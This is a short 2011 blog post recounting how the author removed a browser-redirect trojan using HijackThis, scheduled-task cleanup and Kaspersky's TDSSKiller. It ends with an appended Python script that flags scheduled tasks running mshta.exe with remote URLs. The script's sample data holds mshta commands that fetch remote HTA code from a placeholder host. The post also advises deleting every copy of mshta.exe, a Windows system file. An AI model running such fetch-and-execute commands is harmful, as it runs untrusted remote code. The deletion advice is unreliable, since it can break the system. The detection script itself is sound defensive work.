Tuesday, January 25, 2011

Browser Redirect Virus

So I had this virus that was redirecting my browsers; AVG, Spybot and MalwareBytes did not detect anything. After running HijackThis, I noticed some scheduled tasks. When I checked my Task Scheduler I noticed 23 scheduled tasks that ran mshta.exe and some URL. I deleted all of these scheduled tasks, searched my C drive for mshta.exe and deleted all instances of it (may need to use Unlocker to do this).

Once I rebooted I ran AVG, Spybot and MalwareBytes again, AVG found 4 things and could not remove them:

"C:\WINDOWS\system32\svchost.exe (1652):\memory_001a0000";"Trojan horse Agent_r.XJ";"Object is inaccessible."
"C:\WINDOWS\system32\svchost.exe (1652)";"Trojan horse Agent_r.XJ";""
"C:\WINDOWS\explorer.exe (636):\memory_001a0000";"Trojan horse Agent_r.XJ";"Object is inaccessible."
"C:\WINDOWS\explorer.exe (636)";"Trojan horse Agent_r.XJ";""

After some googling I found someone recommending TDSSKiller from Kaspersky. So I ran this program and it found 2 threats and removed them with a reboot. It healed my system completely, and an AVG scan confirmed this.


Download Link: http://support.kaspersky.com/downloads/utils/tdsskiller.zip
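
The scheduled-task check described above can be scripted. The following is an added example, not part of the original post: it reads the CSV produced by `schtasks /query /fo csv /v` and flags tasks whose action runs mshta.exe with a remote URL. The sample export, its trimmed column set, the task names and the URLs are constructed for illustration.

```python
import csv
import io
import re

# Constructed sample: a trimmed-down `schtasks /query /fo csv /v` export.
# Real exports carry more columns; only TaskName and "Task To Run" are used.
SAMPLE_CSV = '''"HostName","TaskName","Status","Task To Run"
"PC01","\\GoogleUpdateTask","Ready","C:\\Program Files\\Google\\Update\\GoogleUpdate.exe /c"
"PC01","\\At1","Ready","mshta.exe http://example.invalid/a.hta"
"HostName","TaskName","Status","Task To Run"
"PC01","\\At2","Ready","C:\\WINDOWS\\system32\\MSHTA.EXE ""https://example.invalid/b"""
"PC01","\\LocalHelp","Ready","mshta.exe C:\\tools\\help.hta"
'''

# mshta as a program name: at the start, or after a path separator, quote or space.
MSHTA = re.compile(r'(?:^|[\\/"\s])mshta(?:\.exe)?\b', re.IGNORECASE)
# A remote location passed as an argument.
URL = re.compile(r'\b(?:https?|ftp)://[^\s"]+', re.IGNORECASE)


def find_mshta_url_tasks(csv_text):
    """Return (task name, url) for every task that runs mshta with a URL."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row.get("TaskName") or ""
        action = row.get("Task To Run") or ""
        # Defensive: skip a header row repeated in the middle of the export.
        if name == "TaskName":
            continue
        if not MSHTA.search(action):
            continue
        url = URL.search(action)
        # mshta opening a local .hta file is not flagged; only remote URLs are.
        if url:
            hits.append((name, url.group(0)))
    return hits


if __name__ == "__main__":
    for task, url in find_mshta_url_tasks(SAMPLE_CSV):
        print(f"suspicious task {task}: mshta -> {url}")
```

To use it on a real machine, save the output of `schtasks /query /fo csv /v` to a file and pass its contents to `find_mshta_url_tasks`.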
